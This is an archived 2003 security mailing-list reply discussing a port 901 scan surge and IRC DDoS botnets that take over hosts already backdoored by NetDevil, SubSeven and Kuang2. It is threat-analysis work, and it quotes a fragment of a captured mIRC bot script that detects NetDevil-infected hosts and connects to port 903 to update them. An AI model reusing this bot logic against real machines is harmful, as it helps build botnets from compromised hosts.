[Dshield] new trojan - port 901 spike

Joe Stewart jstewart at lurhq.com
Thu Jun 5 13:03:57 GMT 2003


On Wednesday 04 June 2003 08:10 pm, Johannes B. Ullrich wrote:
> I just put up a quick draft of a writeup explaining
> the recent surge in port 901:
>
> http://isc.sans.org/diary.html?date=2003-06-04

The writeup is a little unclear... it sounds as if NetDevil has to be 
listening on port 901, and then the attacker uploads... NetDevil?

Could it be uploading some IRC DDoS bot instead? On the Intrusions
mailing list, John Sage reported capturing a file from a host that was
probing for SubSeven. In that file was a mIRC-based bot with the
capability to also infect Net-Devil as well. So it looks like we have
several different DDoS botnets being built using SubSeven, Kuang2
and NetDevil, because they are easy targets for bottom-feeders.

The post where John reported the location of the downloaded file: 
http://cert.uni-stuttgart.de/archive/intrusions/2003/05/msg00240.html

Here is an excerpt of the mIRC script found in that file which checks for
NetDevil:
  if (ver1. isin %scan.info) { smsg $sc net-devil found $+ $lb $+ ! $+ $rb $+ 
. $sock($sockname).ip $sock($sockname).port version: $b($right(%scan.info,3)) 
| if ($right(%scan.info,1) == 5) { sockopen nd903[ $+ $r $+ ] 
$sock($sockname).ip 903 | sockrename $sockname ndrun $+ $sock($sockname).ip | 
halt } | sockopen nd9032[ $+ $r $+ ] $sock($sockname).ip 903 | sockrename 
$sockname ndrun $+ $sock($sockname).ip }
  if (%scan.info == pass_pleaz) { .sc $sockname }
 .timer 1 120 sc $sockname
}
on 1:sockread:ndrun*:{
  if ($sockerr > 0) { .sc $sockname | halt }
  var %ndrun | sockread -f %ndrun
  if (%ndrun == pleaz_run_done) { smsg $sc done updating net-devil 
$sock($sockname).ip $sock($sockname).port }
  .timer 1 120 sockclose $sockname
}


-- 
Joe Stewart, GCIH 
Senior Intrusion Analyst
LURHQ Corporation
http://www.lurhq.com/




More information about the list mailing list